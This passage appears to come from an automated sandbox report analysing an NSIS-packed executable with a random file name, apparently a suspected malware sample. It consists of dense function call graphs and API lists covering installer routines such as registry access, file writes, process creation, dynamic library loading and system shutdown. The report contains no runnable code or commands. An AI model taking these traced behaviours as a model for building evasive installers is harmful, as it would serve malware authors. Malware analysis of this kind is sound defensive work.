3675->3660 3675->3661 3675->3663 3675->3664 3675->3668 3675->3673 3681 4058fd MessageBoxIndirectW 3675->3681 3685 401864 3675->3685 3686 405d8d GetFileAttributesW CreateFileW 3675->3686 3677 4018e6 3676->3677 3678 4018f9 3676->3678 3679 4062b9 17 API calls 3677->3679 3680 4062b9 17 API calls 3678->3680 3682 4018ee lstrcatW 3679->3682 3683 401901 3680->3683 3681->3675 3682->3683 3684 4058fd MessageBoxIndirectW 3683->3684 3684->3670 3685->3667 3685->3670 3686->3675 3687->3655 3688->3656 4059 4027ef 4060 4027f6 4059->4060 4066 402a70 4059->4066 4061 402c1f 17 API calls 4060->4061 4062 4027fd 4061->4062 4063 40280c SetFilePointer 4062->4063 4064 40281c 4063->4064 4063->4066 4067 4061de wsprintfW 4064->4067 4067->4066 4068 401a72 4069 402c1f 17 API calls 4068->4069 4070 401a7b 4069->4070 4071 402c1f 17 API calls 4070->4071 4072 401a20 4071->4072 3712 401573 3713 401583 ShowWindow 3712->3713 3714 40158c 3712->3714 3713->3714 3715 40159a ShowWindow 3714->3715 3716 402ac5 3714->3716 3715->3716 4073 405273 4074 405283 4073->4074 4075 405297 4073->4075 4077 4052e0 4074->4077 4078 405289 4074->4078 4076 40529f IsWindowVisible 4075->4076 4084 4052b6 4075->4084 4076->4077 4079 4052ac 4076->4079 4080 4052e5 CallWindowProcW 4077->4080 4081 40425a SendMessageW 4078->4081 4086 404bc9 SendMessageW 4079->4086 4082 405293 4080->4082 4081->4082 4084->4080 4091 404c49 4084->4091 4087 404c28 SendMessageW 4086->4087 4088 404bec GetMessagePos ScreenToClient SendMessageW 4086->4088 4089 404c20 4087->4089 4088->4089 4090 404c25 4088->4090 4089->4084 4090->4087 4100 406297 lstrcpynW 4091->4100 4093 404c5c 4101 4061de wsprintfW 4093->4101 4095 404c66 4096 40140b 2 API calls 4095->4096 4097 404c6f 4096->4097 4102 406297 lstrcpynW 4097->4102 4099 404c76 4099->4077 4100->4093 4101->4095 4102->4099 4103 402df3 4104 402e05 SetTimer 4103->4104 4105 402e1e 4103->4105 4104->4105 4106 402e73 4105->4106 4107 402e38 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4105->4107 4107->4106 4108 401cf3 4109 402c1f 17 API calls 4108->4109 4110 401cf9 IsWindow 4109->4110 4111 401a20 4110->4111 4112 4014f5 SetForegroundWindow 4113 402ac5 4112->4113 4114 402576 4115 402c41 17 API calls 4114->4115 4116 40257d 4115->4116 4119 405d8d GetFileAttributesW CreateFileW 4116->4119 4118 402589 4119->4118 4120 401b77 4121 401b84 4120->4121 4122 401bc8 4120->4122 4123 4022e4 4121->4123 4129 401b9b 4121->4129 4124 401bf2 GlobalAlloc 4122->4124 4125 401bcd 4122->4125 4127 4062b9 17 API calls 4123->4127 4126 4062b9 17 API calls 4124->4126 4132 401c0d 4125->4132 4141 406297 lstrcpynW 4125->4141 4126->4132 4128 4022f1 4127->4128 4134 4058fd MessageBoxIndirectW 4128->4134 4139 406297 lstrcpynW 4129->4139 4133 401bdf GlobalFree 4133->4132 4134->4132 4135 401baa 4140 406297 lstrcpynW 4135->4140 4137 401bb9 4142 406297 lstrcpynW 4137->4142 4139->4135 4140->4137 4141->4133 4142->4132 3811 4024f8 3812 402c81 17 API calls 3811->3812 3813 402502 3812->3813 3814 402c1f 17 API calls 3813->3814 3815 40250b 3814->3815 3816 402533 RegEnumValueW 3815->3816 3817 402527 RegEnumKeyW 3815->3817 3820 40288b 3815->3820 3818 40254f RegCloseKey 3816->3818 3819 402548 3816->3819 3817->3818 3818->3820 3819->3818 4143 40167b 4144 402c41 17 API calls 4143->4144 4145 401682 4144->4145 4146 402c41 17 API calls 4145->4146 4147 40168b 4146->4147 4148 402c41 17 API calls 4147->4148 4149 401694 MoveFileW 4148->4149 4150 4016a7 4149->4150 4156 4016a0 4149->4156 4152 4065da 2 API calls 4150->4152 4154 402250 4150->4154 4151 401423 24 API calls 4151->4154 4153 4016b6 4152->4153 4153->4154 4155 40605d 36 API calls 4153->4155 4155->4156 4156->4151 4157 404c7b GetDlgItem GetDlgItem 4158 404ccd 7 API calls 4157->4158 4161 404ee6 4157->4161 4159 404d70 DeleteObject 4158->4159 4160 404d63 SendMessageW 4158->4160 4162 404d79 4159->4162 4160->4159 4176 404bc9 5 API calls 4161->4176 4180 404fca 4161->4180 4189 404f57 4161->4189 4163 404db0 4162->4163 4165 4062b9 17 API calls 4162->4165 4166 40420e 18 API calls 4163->4166 4164 405076 4169 405080 SendMessageW 4164->4169 4170 405088 4164->4170 4171 404d92 SendMessageW SendMessageW 4165->4171 4167 404dc4 4166->4167 4172 40420e 18 API calls 4167->4172 4168 404ed9 4174 404275 8 API calls 4168->4174 4169->4170 4181 4050a1 4170->4181 4182 40509a ImageList_Destroy 4170->4182 4186 4050b1 4170->4186 4171->4162 4190 404dd2 4172->4190 4173 405023 SendMessageW 4173->4168 4178 405038 SendMessageW 4173->4178 4179 40526c 4174->4179 4175 404fbc SendMessageW 4175->4180 4176->4189 4177 405220 4177->4168 4187 405232 ShowWindow GetDlgItem ShowWindow 4177->4187 4185 40504b 4178->4185 4180->4164 4180->4168 4180->4173 4183 4050aa GlobalFree 4181->4183 4181->4186 4182->4181 4183->4186 4184 404ea7 GetWindowLongW SetWindowLongW 4188 404ec0 4184->4188 4195 40505c SendMessageW 4185->4195 4186->4177 4200 404c49 4 API calls 4186->4200 4204 4050ec 4186->4204 4187->4168 4191 404ec6 ShowWindow 4188->4191 4192 404ede 4188->4192 4189->4175 4189->4180 4190->4184 4194 404e22 SendMessageW 4190->4194 4196 404ea1 4190->4196 4198 404e5e SendMessageW 4190->4198 4199 404e6f SendMessageW 4190->4199 4208 404243 SendMessageW 4191->4208 4209 404243 SendMessageW 4192->4209 4194->4190 4195->4164 4196->4184 4196->4188 4198->4190 4199->4190 4200->4204 4201 4051f6 InvalidateRect 4201->4177 4202 40520c 4201->4202 4210 404b84 4202->4210 4203 40511a SendMessageW 4207 405130 4203->4207 4204->4203 4204->4207 4206 4051a4 SendMessageW SendMessageW 4206->4207 4207->4201 4207->4206 4208->4168 4209->4161 4213 404abb 4210->4213 4212 404b99 4212->4177 4214 404ad4 4213->4214 4215 4062b9 17 API calls 4214->4215 4216 404b38 4215->4216 4217 4062b9 17 API calls 4216->4217 4218 404b43 4217->4218 4219 4062b9 17 API calls 4218->4219 4220 404b59 lstrlenW wsprintfW SetDlgItemTextW 4219->4220 4220->4212 4221 401e7d 4222 402c41 17 API calls 4221->4222 4223 401e83 4222->4223 4224 402c41 17 API calls 4223->4224 4225 401e8c 4224->4225 4226 402c41 17 API calls 4225->4226 4227 401e95 4226->4227 4228 402c41 17 API calls 4227->4228 4229 401e9e 4228->4229 4230 401423 24 API calls 4229->4230 4231 401ea5 4230->4231 4238 4058c3 ShellExecuteExW 4231->4238 4233 401ee7 4234 406722 5 API calls 4233->4234 4236 40288b 4233->4236 4235 401f01 CloseHandle 4234->4235 4235->4236 4238->4233 4239 40437e lstrlenW 4240 40439d 4239->4240 4241 40439f WideCharToMultiByte 4239->4241 4240->4241 4242 4019ff 4243 402c41 17 API calls 4242->4243 4244 401a06 4243->4244 4245 402c41 17 API calls 4244->4245 4246 401a0f 4245->4246 4247 401a16 lstrcmpiW 4246->4247 4248 401a28 lstrcmpW 4246->4248 4249 401a1c 4247->4249 4248->4249 4250 4046ff 4251 40472b 4250->4251 4252 40473c 4250->4252 4311 4058e1 GetDlgItemTextW 4251->4311 4254 404748 GetDlgItem 4252->4254 4260 4047a7 4252->4260 4255 40475c 4254->4255 4259 404770 SetWindowTextW 4255->4259 4263 405c17 4 API calls 4255->4263 4256 40488b 4309 404a3a 4256->4309 4313 4058e1 GetDlgItemTextW 4256->4313 4257 404736 4258 40652b 5 API calls 4257->4258 4258->4252 4264 40420e 18 API calls 4259->4264 4260->4256 4265 4062b9 17 API calls 4260->4265 4260->4309 4262 404275 8 API calls 4267 404a4e 4262->4267 4268 404766 4263->4268 4269 40478c 4264->4269 4270 40481b SHBrowseForFolderW 4265->4270 4266 4048bb 4271 405c74 18 API calls 4266->4271 4268->4259 4275 405b6c 3 API calls 4268->4275 4272 40420e 18 API calls 4269->4272 4270->4256 4273 404833 CoTaskMemFree 4270->4273 4274 4048c1 4271->4274 4276 40479a 4272->4276 4277 405b6c 3 API calls 4273->4277 4314 406297 lstrcpynW 4274->4314 4275->4259 4312 404243 SendMessageW 4276->4312 4279 404840 4277->4279 4282 404877 SetDlgItemTextW 4279->4282 4286 4062b9 17 API calls 4279->4286 4281 4047a0 4284 406671 5 API calls 4281->4284 4282->4256 4283 4048d8 4285 406671 5 API calls 4283->4285 4284->4260 4293 4048df 4285->4293 4287 40485f lstrcmpiW 4286->4287 4287->4282 4289 404870 lstrcatW 4287->4289 4288 404920 4315 406297 lstrcpynW 4288->4315 4289->4282 4291 404927 4292 405c17 4 API calls 4291->4292 4294 40492d GetDiskFreeSpaceW 4292->4294 4293->4288 4297 405bb8 2 API calls 4293->4297 4298 404978 4293->4298 4296 404951 MulDiv 4294->4296 4294->4298 4296->4298 4297->4293 4299 4049e9 4298->4299 4301 404b84 20 API calls 4298->4301 4300 404a0c 4299->4300 4302 40140b 2 API calls 4299->4302 4316 404230 KiUserCallbackDispatcher 4300->4316 4303 4049d6 4301->4303 4302->4300 4305 4049eb SetDlgItemTextW 4303->4305 4306 4049db 4303->4306 4305->4299 4307 404abb 20 API calls 4306->4307 4307->4299 4308 404a28 4308->4309 4310 404658 SendMessageW 4308->4310 4309->4262 4310->4309 4311->4257 4312->4281 4313->4266 4314->4283 4315->4291 4316->4308 4317 401000 4318 401037 BeginPaint GetClientRect 4317->4318 4319 40100c DefWindowProcW 4317->4319 4321 4010f3 4318->4321 4322 401179 4319->4322 4323 401073 CreateBrushIndirect FillRect DeleteObject 4321->4323 4324 4010fc 4321->4324 4323->4321 4325 401102 CreateFontIndirectW 4324->4325 4326 401167 EndPaint 4324->4326 4325->4326 4327 401112 6 API calls 4325->4327 4326->4322 4327->4326 4328 401503 4329 40150b 4328->4329 4331 40151e 4328->4331 4330 402c1f 17 API calls 4329->4330 4330->4331 3297 402484 3308 402c81 3297->3308 3300 402c41 17 API calls 3301 402497 3300->3301 3302 4024a2 RegQueryValueExW 3301->3302 3307 40288b 3301->3307 3303 4024c8 RegCloseKey 3302->3303 3304 4024c2 3302->3304 3303->3307 3304->3303 3313 4061de wsprintfW 3304->3313 3309 402c41 17 API calls 3308->3309 3310 402c98 3309->3310 3311 406104 RegOpenKeyExW 3310->3311 3312 40248e 3311->3312 3312->3300 3313->3303 4332 402104 4333 402c41 17 API calls 4332->4333 4334 40210b 4333->4334 4335 402c41 17 API calls 4334->4335 4336 402115 4335->4336 4337 402c41 17 API calls 4336->4337 4338 40211f 4337->4338 4339 402c41 17 API calls 4338->4339 4340 402129 4339->4340 4341 402c41 17 API calls 4340->4341 4343 402133 4341->4343 4342 402172 CoCreateInstance 4347 402191 4342->4347 4343->4342 4344 402c41 17 API calls 4343->4344 4344->4342 4345 401423 24 API calls 4346 402250 4345->4346 4347->4345 4347->4346 3314 401f06 3315 402c41 17 API calls 3314->3315 3316 401f0c 3315->3316 3317 4052ff 24 API calls 3316->3317 3318 401f16 3317->3318 3329 405880 CreateProcessW 3318->3329 3321 401f3f CloseHandle 3325 40288b 3321->3325 3324 401f31 3326 401f41 3324->3326 3327 401f36 3324->3327 3326->3321 3337 4061de wsprintfW 3327->3337 3330 4058b3 CloseHandle 3329->3330 3331 401f1c 3329->3331 3330->3331 3331->3321 3331->3325 3332 406722 WaitForSingleObject 3331->3332 3333 40673c 3332->3333 3334 40674e GetExitCodeProcess 3333->3334 3338 4066ad 3333->3338 3334->3324 3337->3321 3339 4066ca PeekMessageW 3338->3339 3340 4066c0 DispatchMessageW 3339->3340 3341 4066da WaitForSingleObject 3339->3341 3340->3339 3341->3333 3609 40230c 3610 402314 3609->3610 3612 40231a 3609->3612 3611 402c41 17 API calls 3610->3611 3611->3612 3613 402328 3612->3613 3614 402c41 17 API calls 3612->3614 3615 402336 3613->3615 3616 402c41 17 API calls 3613->3616 3614->3613 3617 402c41 17 API calls 3615->3617 3616->3615 3618 40233f WritePrivateProfileStringW 3617->3618 4348 40190c 4349 401943 4348->4349 4350 402c41 17 API calls 4349->4350 4351 401948 4350->4351 4352 4059a9 67 API calls 4351->4352 4353 401951 4352->4353 4354 401f8c 4355 402c41 17 API calls 4354->4355 4356 401f93 4355->4356 4357 406671 5 API calls 4356->4357 4358 401fa2 4357->4358 4359 402026 4358->4359 4360 401fbe GlobalAlloc 4358->4360 4360->4359 4361 401fd2 4360->4361 4362 406671 5 API calls 4361->4362 4363 401fd9 4362->4363 4364 406671 5 API calls 4363->4364 4365 401fe3 4364->4365 4365->4359 4369 4061de wsprintfW 4365->4369 4367 402018 4370 4061de wsprintfW 4367->4370 4369->4367 4370->4359 3619 40238e 3620 4023c1 3619->3620 3621 402396 3619->3621 3622 402c41 17 API calls 3620->3622 3623 402c81 17 API calls 3621->3623 3624 4023c8 3622->3624 3625 40239d 3623->3625 3631 402cff 3624->3631 3627 4023a7 3625->3627 3629 4023d5 3625->3629 3628 402c41 17 API calls 3627->3628 3630 4023ae RegDeleteValueW RegCloseKey 3628->3630 3630->3629 3632 402d0c 3631->3632 3633 402d13 3631->3633 3632->3629 3633->3632 3635 402d44 3633->3635 3636 406104 RegOpenKeyExW 3635->3636 3637 402d72 3636->3637 3638 402dec 3637->3638 3640 402d76 3637->3640 3638->3632 3639 402d98 RegEnumKeyW 3639->3640 3641 402daf RegCloseKey 3639->3641 3640->3639 3640->3641 3643 402dd0 RegCloseKey 3640->3643 3645 402d44 6 API calls 3640->3645 3642 406671 5 API calls 3641->3642 3644 402dbf 3642->3644 3643->3638 3646 402de0 RegDeleteKeyW 3644->3646 3647 402dc3 3644->3647 3645->3640 3646->3638 3647->3638 4371 40190f 4372 402c41 17 API calls 4371->4372 4373 401916 4372->4373 4374 4058fd MessageBoxIndirectW 4373->4374 4375 40191f 4374->4375 4376 401491 4377 4052ff 24 API calls 4376->4377 4378 401498 4377->4378 4379 401d14 4380 402c1f 17 API calls 4379->4380 4381 401d1b 4380->4381 4382 402c1f 17 API calls 4381->4382 4383 401d27 GetDlgItem 4382->4383 4384 402592 4383->4384 4385 402598 4386 4025c7 4385->4386 4387 4025ac 4385->4387 4388 4025fb 4386->4388 4389 4025cc 4386->4389 4390 402c1f 17 API calls 4387->4390 4392 402c41 17 API calls 4388->4392 4391 402c41 17 API calls 4389->4391 4395 4025b3 4390->4395 4393 4025d3 WideCharToMultiByte lstrlenA 4391->4393 4394 402602 lstrlenW 4392->4394 4393->4395 4394->4395 4396 40262f 4395->4396 4397 402645 4395->4397 4399 405e6e 5 API calls 4395->4399 4396->4397 4398 405e3f WriteFile 4396->4398 4398->4397 4399->4396 4400 40149e 4401 4022f7 4400->4401 4402 4014ac PostQuitMessage 4400->4402 4402->4401 4403 401c1f 4404 402c1f 17 API calls 4403->4404 4405 401c26 4404->4405 4406 402c1f 17 API calls 4405->4406 4407 401c33 4406->4407 4408 401c48 4407->4408 4409 402c41 17 API calls 4407->4409 4410 401c58 4408->4410 4413 402c41 17 API calls 4408->4413 4409->4408 4411 401c63 4410->4411 4412 401caf 4410->4412 4414 402c1f 17 API calls 4411->4414 4415 402c41 17 API calls 4412->4415 4413->4410 4416 401c68 4414->4416 4417 401cb4 4415->4417 4418 402c1f 17 API calls 4416->4418 4419 402c41 17 API calls 4417->4419 4420 401c74 4418->4420 4421 401cbd FindWindowExW 4419->4421 4422 401c81 SendMessageTimeoutW 4420->4422 4423 401c9f SendMessageW 4420->4423 4424 401cdf 4421->4424 4422->4424 4423->4424 4425 402aa0 SendMessageW 4426 402ac5 4425->4426 4427 402aba InvalidateRect 4425->4427 4427->4426 4428 402821 4429 402827 4428->4429 4430 402ac5 4429->4430 4431 40282f FindClose 4429->4431 4431->4430 3241 4015a3 3242 402c41 17 API calls 3241->3242 3243 4015aa SetFileAttributesW 3242->3243 3244 4015bc 3243->3244 4432 4029a8 4433 402c1f 17 API calls 4432->4433 4434 4029ae 4433->4434 4435 4029d5 4434->4435 4436 4029ee 4434->4436 4442 40288b 4434->4442 4439 4029da 4435->4439 4445 4029eb 4435->4445 4437 402a08 4436->4437 4438 4029f8 4436->4438 4441 4062b9 17 API calls 4437->4441 4440 402c1f 17 API calls 4438->4440 4446 406297 lstrcpynW 4439->4446 4440->4445 4441->4445 4445->4442 4447 4061de wsprintfW 4445->4447 4446->4442 4447->4442 4448 4028ad 4449 402c41 17 API calls 4448->4449 4451 4028bb 4449->4451 4450 4028d1 4453 405d68 2 API calls 4450->4453 4451->4450 4452 402c41 17 API calls 4451->4452 4452->4450 4454 4028d7 4453->4454 4476 405d8d GetFileAttributesW CreateFileW 4454->4476 4456 4028e4 4457 4028f0 GlobalAlloc 4456->4457 4458 402987 4456->4458 4459 402909 4457->4459 4460 40297e CloseHandle 4457->4460 4461 4029a2 4458->4461 4462 40298f DeleteFileW 4458->4462 4477 403324 SetFilePointer 4459->4477 4460->4458 4462->4461 4464 40290f 4465 40330e ReadFile 4464->4465 4466 402918 GlobalAlloc 4465->4466 4467 402928 4466->4467 4468 40295c 4466->4468 4470 403116 31 API calls 4467->4470 4469 405e3f WriteFile 4468->4469 4471 402968 GlobalFree 4469->4471 4475 402935 4470->4475 4472 403116 31 API calls 4471->4472 4473 40297b 4472->4473 4473->4460 4474 402953 GlobalFree 4474->4468 4475->4474 4476->4456 4477->4464 4478 401a30 4479 402c41 17 API calls 4478->4479 4480 401a39 ExpandEnvironmentStringsW 4479->4480 4481 401a4d 4480->4481 4483 401a60 4480->4483 4482 401a52 lstrcmpW 4481->4482 4481->4483 4482->4483 3689 402032 3690 402044 3689->3690 3691 4020f6 3689->3691 3692 402c41 17 API calls 3690->3692 3694 401423 24 API calls 3691->3694 3693 40204b 3692->3693 3695 402c41 17 API calls 3693->3695 3700 402250 3694->3700 3696 402054 3695->3696 3697 40206a LoadLibraryExW 3696->3697 3698 40205c GetModuleHandleW 3696->3698 3697->3691 3699 40207b 3697->3699 3698->3697 3698->3699 3709 4066e0 WideCharToMultiByte 3699->3709 3703 4020c5 3705 4052ff 24 API calls 3703->3705 3704 40208c 3706 401423 24 API calls 3704->3706 3707 40209c 3704->3707 3705->3707 3706->3707 3707->3700 3708 4020e8 FreeLibrary 3707->3708 3708->3700 3710 40670a GetProcAddress 3709->3710 3711 402086 3709->3711 3710->3711 3711->3703 3711->3704 3717 403d35 3718 403e88 3717->3718 3719 403d4d 3717->3719 3721 403ed9 3718->3721 3722 403e99 GetDlgItem GetDlgItem 3718->3722 3719->3718 3720 403d59 3719->3720 3723 403d64 SetWindowPos 3720->3723 3724 403d77 3720->3724 3726 403f33 3721->3726 3731 401389 2 API calls 3721->3731 3725 40420e 18 API calls 3722->3725 3723->3724 3728 403d94 3724->3728 3729 403d7c ShowWindow 3724->3729 3730 403ec3 SetClassLongW 3725->3730 3727 40425a SendMessageW 3726->3727 3747 403e83 3726->3747 3753 403f45 3727->3753 3732 403db6 3728->3732 3733 403d9c DestroyWindow 3728->3733 3729->3728 3734 40140b 2 API calls 3730->3734 3735 403f0b 3731->3735 3736 403dbb SetWindowLongW 3732->3736 3737 403dcc 3732->3737 3787 404197 3733->3787 3734->3721 3735->3726 3740 403f0f SendMessageW 3735->3740 3736->3747 3738 403e75 3737->3738 3739 403dd8 GetDlgItem 3737->3739 3797 404275 3738->3797 3743 403e08 3739->3743 3744 403deb SendMessageW IsWindowEnabled 3739->3744 3740->3747 3741 40140b 2 API calls 3741->3753 3742 404199 DestroyWindow EndDialog 3742->3787 3749 403e15 3743->3749 3750 403e5c SendMessageW 3743->3750 3751 403e28 3743->3751 3761 403e0d 3743->3761 3744->3743 3744->3747 3746 4041c8 ShowWindow 3746->3747 3748 4062b9 17 API calls 3748->3753 3749->3750 3749->3761 3750->3738 3754 403e30 3751->3754 3755 403e45 3751->3755 3753->3741 3753->3742 3753->3747 3753->3748 3757 40420e 18 API calls 3753->3757 3778 4040d9 DestroyWindow 3753->3778 3788 40420e 3753->3788 3759 40140b 2 API calls 3754->3759 3758 40140b 2 API calls 3755->3758 3756 403e43 3756->3738 3757->3753 3760 403e4c 3758->3760 3759->3761 3760->3738 3760->3761 3794 4041e7 3761->3794 3763 403fc0 GetDlgItem 3764 403fd5 3763->3764 3765 403fdd ShowWindow KiUserCallbackDispatcher 3763->3765 3764->3765 3791 404230 KiUserCallbackDispatcher 3765->3791 3767 404007 EnableWindow 3771 40401b 3767->3771 3768 404020 GetSystemMenu EnableMenuItem SendMessageW 3769 404050 SendMessageW 3768->3769 3768->3771 3769->3771 3771->3768 3772 403d16 18 API calls 3771->3772 3792 404243 SendMessageW 3771->3792 3793 406297 lstrcpynW 3771->3793 3772->3771 3774 40407f lstrlenW 3775 4062b9 17 API calls 3774->3775 3776 404095 SetWindowTextW 3775->3776 3777 401389 2 API calls 3776->3777 3777->3753 3779 4040f3 CreateDialogParamW 3778->3779 3778->3787 3780 404126 3779->3780 3779->3787 3781 40420e 18 API calls 3780->3781 3782 404131 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3781->3782 3783 401389 2 API calls 3782->3783 3784 404177 3783->3784 3784->3747 3785 40417f ShowWindow 3784->3785 3786 40425a SendMessageW 3785->3786 3786->3787 3787->3746 3787->3747 3789 4062b9 17 API calls 3788->3789 3790 404219 SetDlgItemTextW 3789->3790 3790->3763 3791->3767 3792->3771 3793->3774 3795 4041f4 SendMessageW 3794->3795 3796 4041ee 3794->3796 3795->3756 3796->3795 3798 40428d GetWindowLongW 3797->3798 3799 404338 3797->3799 3798->3799 3800 4042a2 3798->3800 3799->3747 3800->3799 3801 4042d2 3800->3801 3802 4042cf GetSysColor 3800->3802 3803 4042e2 SetBkMode 3801->3803 3804 4042d8 SetTextColor 3801->3804 3802->3801 3805 404300 3803->3805 3806 4042fa GetSysColor 3803->3806 3804->3803 3807 404311 3805->3807 3808 404307 SetBkColor 3805->3808 3806->3805 3807->3799 3809 404324 DeleteObject 3807->3809 3810 40432b CreateBrushIndirect 3807->3810 3808->3807 3809->3810 3810->3799 4489 401735 4490 402c41 17 API calls 4489->4490 4491 40173c SearchPathW 4490->4491 4492 401757 4491->4492 4493 402a35 4494 402c1f 17 API calls 4493->4494 4495 402a3b 4494->4495 4496 402a72 4495->4496 4497 40288b 4495->4497 4499 402a4d 4495->4499 4496->4497 4498 4062b9 17 API calls 4496->4498 4498->4497 4499->4497 4501 4061de wsprintfW 4499->4501 4501->4497 4502 4014b8 4503 4014be 4502->4503 4504 401389 2 API calls 4503->4504 4505 4014c6 4504->4505 4506 4046b8 4507 4046c8 4506->4507 4508 4046ee 4506->4508 4509 40420e 18 API calls 4507->4509 4510 404275 8 API calls 4508->4510 4511 4046d5 SetDlgItemTextW 4509->4511 4512 4046fa 4510->4512 4511->4508 4513 401db9 GetDC 4514 402c1f 17 API calls 4513->4514 4515 401dcb GetDeviceCaps MulDiv ReleaseDC 4514->4515 4516 402c1f 17 API calls 4515->4516 4517 401dfc 4516->4517 4518 4062b9 17 API calls 4517->4518 4519 401e39 CreateFontIndirectW 4518->4519 4520 402592 4519->4520 4521 40283b 4522 402843 4521->4522 4523 402847 FindNextFileW 4522->4523 4526 402859 4522->4526 4524 4028a0 4523->4524 4523->4526 4527 406297 lstrcpynW 4524->4527 4527->4526 3843 40543e 3844 4055e8 3843->3844 3845 40545f GetDlgItem GetDlgItem GetDlgItem 3843->3845 3847 4055f1 GetDlgItem CreateThread CloseHandle 3844->3847 3848 405619 3844->3848 3888 404243 SendMessageW 3845->3888 3847->3848 3891 4053d2 5 API calls 3847->3891 3849 405630 ShowWindow ShowWindow 3848->3849 3850 405669 3848->3850 3851 405644 3848->3851 3890 404243 SendMessageW 3849->3890 3857 404275 8 API calls 3850->3857 3852 4056a4 3851->3852 3855 405658 3851->3855 3856 40567e ShowWindow 3851->3856 3852->3850 3859 4056b2 SendMessageW 3852->3859 3853 4054cf 3858 4054d6 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3853->3858 3860 4041e7 SendMessageW 3855->3860 3862 405690 3856->3862 3863 40569e 3856->3863 3861 405677 3857->3861 3864 405544 3858->3864 3865 405528 SendMessageW SendMessageW 3858->3865 3859->3861 3866 4056cb CreatePopupMenu 3859->3866 3860->3850 3869 4052ff 24 API calls 3862->3869 3870 4041e7 SendMessageW 3863->3870 3867 405557 3864->3867 3868 405549 SendMessageW 3864->3868 3865->3864 3871 4062b9 17 API calls 3866->3871 3872 40420e 18 API calls 3867->3872 3868->3867 3869->3863 3870->3852 3873 4056db AppendMenuW 3871->3873 3874 405567 3872->3874 3875 4056f8 GetWindowRect 3873->3875 3876 40570b TrackPopupMenu 3873->3876 3877 405570 ShowWindow 3874->3877 3878 4055a4 GetDlgItem SendMessageW 3874->3878 3875->3876 3876->3861 3879 405726 3876->3879 3880 405593 3877->3880 3881 405586 ShowWindow 3877->3881 3878->3861 3882 4055cb SendMessageW SendMessageW 3878->3882 3883 405742 SendMessageW 3879->3883 3889 404243 SendMessageW 3880->3889 3881->3880 3882->3861 3883->3883 3884 40575f OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3883->3884 3886 405784 SendMessageW 3884->3886 3886->3886 3887 4057ad GlobalUnlock SetClipboardData CloseClipboard 3886->3887 3887->3861 3888->3853 3889->3878 3890->3851

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 0 40336c-4033a9 SetErrorMode GetVersion 1 4033ab-4033b3 call 406671 0->1 2 4033bc 0->2 1->2 7 4033b5 1->7 4 4033c1-4033d5 call 406601 lstrlenA 2->4 9 4033d7-4033f3 call 406671 * 3 4->9 7->2 16 403404-403463 #17 OleInitialize SHGetFileInfoW call 406297 GetCommandLineW call 406297 9->16 17 4033f5-4033fb 9->17 24 403465-40346c 16->24 25 40346d-403487 call 405b99 CharNextW 16->25 17->16 21 4033fd 17->21 21->16 24->25 28 40348d-403493 25->28 29 40359e-4035b8 GetTempPathW call 40333b 25->29 31 403495-40349a 28->31 32 40349c-4034a0 28->32 38 403610-40362a DeleteFileW call 402edd 29->38 39 4035ba-4035d8 GetWindowsDirectoryW lstrcatW call 40333b 29->39 31->31 31->32 33 4034a2-4034a6 32->33 34 4034a7-4034ab 32->34 33->34 36 4034b1-4034b7 34->36 37 40356a-403577 call 405b99 34->37 41 4034d2-40350b 36->41 42 4034b9-4034c1 36->42 52 403579-40357a 37->52 53 40357b-403581 37->53 54 403630-403636 38->54 55 4036db-4036eb call 4038ad OleUninitialize 38->55 39->38 58 4035da-40360a GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 40333b 39->58 48 403528-403562 41->48 49 40350d-403512 41->49 46 4034c3-4034c6 42->46 47 4034c8 42->47 46->41 46->47 47->41 48->37 57 403564-403568 48->57 49->48 56 403514-40351c 49->56 52->53 53->28 59 403587 53->59 60 4036cb-4036d2 call 403987 54->60 61 40363c-403647 call 405b99 54->61 75 403811-403817 55->75 76 4036f1-403701 call 4058fd ExitProcess 55->76 63 403523 56->63 64 40351e-403521 56->64 57->37 65 403589-403597 call 406297 57->65 58->38 58->55 67 40359c 59->67 74 4036d7 60->74 77 403695-40369f 61->77 78 403649-40367e 61->78 63->48 64->48 64->63 65->67 67->29 74->55 80 403895-40389d 75->80 81 403819-40382f GetCurrentProcess OpenProcessToken 75->81 87 4036a1-4036af call 405c74 77->87 88 403707-40371b call 405868 lstrcatW 77->88 84 403680-403684 78->84 85 4038a3-4038a7 ExitProcess 80->85 86 40389f 80->86 82 403831-40385f LookupPrivilegeValueW AdjustTokenPrivileges 81->82 83 403865-403873 call 406671 81->83 82->83 101 403881-40388c ExitWindowsEx 83->101 102 403875-40387f 83->102 91 403686-40368b 84->91 92 40368d-403691 84->92 86->85 87->55 103 4036b1-4036c7 call 406297 * 2 87->103 99 403728-403742 lstrcatW lstrcmpiW 88->99 100 40371d-403723 lstrcatW 88->100 91->92 96 403693 91->96 92->84 92->96 96->77 99->55 105 403744-403747 99->105 100->99 101->80 106 40388e-403890 call 40140b 101->106 102->101 102->106 103->60 108 403750 call 40584b 105->108 109 403749-40374e call 4057ce 105->109 106->80 117 403755-403763 SetCurrentDirectoryW 108->117 109->117 118 403770-403799 call 406297 117->118 119 403765-40376b call 406297 117->119 123 40379e-4037ba call 4062b9 DeleteFileW 118->123 119->118 126 4037fb-403803 123->126 127 4037bc-4037cc CopyFileW 123->127 126->123 129 403805-40380c call 40605d 126->129 127->126 128 4037ce-4037ee call 40605d call 4062b9 call 405880 127->128 128->126 138 4037f0-4037f7 CloseHandle 128->138 129->55 138->126
                                                                    APIs
                                                                    • SetErrorMode.KERNELBASE ref: 0040338F
                                                                    • GetVersion.KERNEL32 ref: 00403395
                                                                    • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033C8
                                                                    • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 00403405
                                                                    • OleInitialize.OLE32(00000000), ref: 0040340C
                                                                    • SHGetFileInfoW.SHELL32(0079FEE0,00000000,?,000002B4,00000000), ref: 00403428
                                                                    • GetCommandLineW.KERNEL32(007A7A20,NSIS Error,?,00000006,00000008,0000000A), ref: 0040343D
                                                                    • CharNextW.USER32(00000000,"C:\Users\user\Desktop\ln5S7fIBkY.exe",00000020,"C:\Users\user\Desktop\ln5S7fIBkY.exe",00000000,?,00000006,00000008,0000000A), ref: 00403475
                                                                      • Part of subcall function 00406671: GetModuleHandleA.KERNEL32(?,00000020,?,004033DE,0000000A), ref: 00406683
                                                                      • Part of subcall function 00406671: GetProcAddress.KERNEL32(00000000,?), ref: 0040669E
